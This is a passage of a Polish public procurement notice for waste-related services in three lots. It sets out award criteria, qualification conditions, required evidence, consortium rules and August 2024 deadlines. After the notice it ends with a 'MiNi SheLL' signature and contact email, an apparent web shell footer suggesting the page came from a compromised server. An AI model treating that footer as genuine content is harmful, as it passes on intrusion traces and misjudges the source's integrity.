<h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla zadania częściowego nr 1:<br/>- Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>- Sytuacji ekonomicznej lub finansowej <br/>1) Wykonawca spełni warunek jeśli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na kwotę minimum 100 000 zł wraz z dowodem uiszczenia składki.<br/>- Zdolności technicznej lub zawodowej<br/> 1) Wykonawca spełni warunek jeśli posiada niezbędne uprawnienia <br/>zgodne z ustawą z 2012 r. o odpadach w zakresie objętym przedmiotem zamówienia.<br/>8.2 Dla zadania częściowego nr 2:<br/>- Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>- Sytuacji ekonomicznej lub finansowej <br/>1) Wykonawca spełni warunek jeśli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na kwotę minimum 100 000 zł wraz z dowodem uiszczenia składki.<br/>- Zdolności technicznej lub zawodowej<br/> 1) Zamawiający nie stawia warunku w powyższym zakresie<br/>8.3 Dla zadania częściowego nr 3:<br/>- Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>- Sytuacji ekonomicznej lub finansowej <br/>1) Wykonawca spełni warunek jeśli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na kwotę minimum 100 000 zł wraz z dowodem uiszczenia składki.<br/>- Zdolności technicznej lub zawodowej<br/> 1) Wykonawca spełni warunek jeśli posiada niezbędne uprawnienia <br/>zgodne z ustawą z 2012 r. o odpadach w zakresie objętym przedmiotem zamówienia.<br/>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału <br/>w postępowaniu na podstawie informacji zawartych w oświadczeniach i dokumentach wymienionych w Rozdziale VII. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) brak podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 109 ust. 1 pkt. 4 ustawy Pzp – odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, <br/>w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzanych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu <br/>do rejestru lub ewidencji. <br/>UWAGA 1: Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych jeżeli można je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał dane umożliwiające dostęp do tych środków. <br/>a) w przypadku powoływania się przez Wykonawcę na podmiot udostępniający zasoby, Wykonawca składa podmiotowy środek dowodowy o którym mowa ppkt 1) dot. tego podmiotu, w celu wykazania że nie podlega on wykluczeniu na podstawie art. 109 ust. 1 pkt 4 ustawy, <br/>b) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument, o którym mowa w ppkt 1) składa każdy z nich.<br/><br/>2)	spełnienie przez Wykonawcę warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej - dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000 zł wraz z dowodem uiszczenia składki.<br/><br/>3)	spełnienie przez Wykonawcę warunku udziału w postępowaniu w zadaniu częściowym nr 1 oraz 3, dotyczącego zdolności technicznej lub zawodowej – potwierdzenie, że Wykonawca posiada wpis do Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami tzw. rejestr BDO w zakresie wytwarzania i transportu odpadów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzanych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa należy załączyć do oferty. Pełnomocnictwo powinno zostać podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia i zawierać wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczy,<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>c) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa wraz z ofertą oświadczenie, o którym mowa w pkt 1 Rozdziału IX SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W tym przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 7 do SWZ.<br/>Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w formularzu oferty. W przypadku złożenia oferty przez konsorcjum wymagane jest wskazanie lidera w formularzu oferty.<br/>Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Umowa taka winna określać strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania każdemu z nich, solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Strony przewidują możliwość zmiany umowy w następujących sytuacjach:<br/>1)	określonych w § 6 Załączników 3a-3c do SWZ – wzory umów, a także <br/>2)	gdy ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej Umowy, który spowoduje konieczność zmiany sposobu wykonania przedmiotu Umowy przez Wykonawcę,<br/>3)	w przypadku zmian obciążeń publiczno-prawnych (np. cła), cen urzędowych <br/>i innych niezależnych od Stron administracyjnych regulacji bezpośrednio wpływających na koszty dostarczenia przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-29 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty wraz z załącznikami należy składać za pośrednictwem platformy zakupowej https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com